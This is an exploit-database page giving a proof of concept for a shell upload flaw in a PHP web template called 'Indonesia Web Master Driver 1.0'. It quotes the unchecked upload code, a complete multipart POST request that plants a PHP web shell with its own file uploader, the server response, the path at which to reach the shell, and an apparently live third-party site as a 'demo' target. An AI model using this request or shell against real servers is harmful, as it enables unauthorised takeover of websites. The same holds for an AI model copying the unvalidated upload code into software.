Indonesia Web Master Driver 1.0 - Shell Upload

2022.10.12
sg X-DEX (SG) sg
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Indonesia Web Master Driver 1.0 - Shell Upload # Date: 10-10-2022 # Exploit Author: X-DEX # Vendor Homepage: https://themeforest.net/user/webmasterdriver # Version: v1.0 # Tested on: Kali Linux ----- POC ----- Note : vulnerability at http://localhost/registact.php " $image1=$_FILES["img1"]["name"]; $image2=$_FILES["img2"]["name"]; $newimg1 = date('dmYHis').$image1; $newimg2 = date('dmYHis').$image2; move_uploaded_file($_FILES["img1"]["tmp_name"],"image/id/".$newimg1); move_uploaded_file($_FILES["img2"]["tmp_name"],"image/id/".$newimg2); " --------------- Request : URL - http://localhost/registact.php =============== use burpsuite POST /registact.php HTTP/1.1 Host: http://localhost Content-Length: 1007 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLBXMHTxHs8OmgM8w User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundaryLBXMHTxHs8OmgM8w Content-Disposition: form-data; name="MAX_FILE_SIZE" 512000 ------WebKitFormBoundaryLBXMHTxHs8OmgM8w Content-Disposition: form-data; name="img1"; filename="m.php" Content-Type: application/x-php <?php echo "<body bgcolor=black>"; echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >"; echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>"; if( isset($_POST['sut']) ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>"; } else { echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>"; } } ?> ------WebKitFormBoundaryLBXMHTxHs8OmgM8w-- Response HTTP/1.1 200 OK Connection: close x-powered-by: localhost set-cookie: PHPSESSID=164455c4fc628fc476d48023c0f44e2e; path=/ expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache content-type: text/html; charset=UTF-8 Content-Length: 153 vary: Accept-Encoding,User-Agent date: Tue, 11 Oct 2022 02:21:20 GMT server: LiteSpeed x-xss-protection: 1; mode=block x-content-type-options: nosniff <script>alert('Email sudah terdaftar, silahkan gunakan email lain!');</script><script type='text/javascript'> document.location = 'regist.php'; </script> shell access = http://localhost/image/id/date('dmYHis')m.php date('dmYHis') use your brain hihihihi Demo site : https://panjitrans.net/registact.php


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top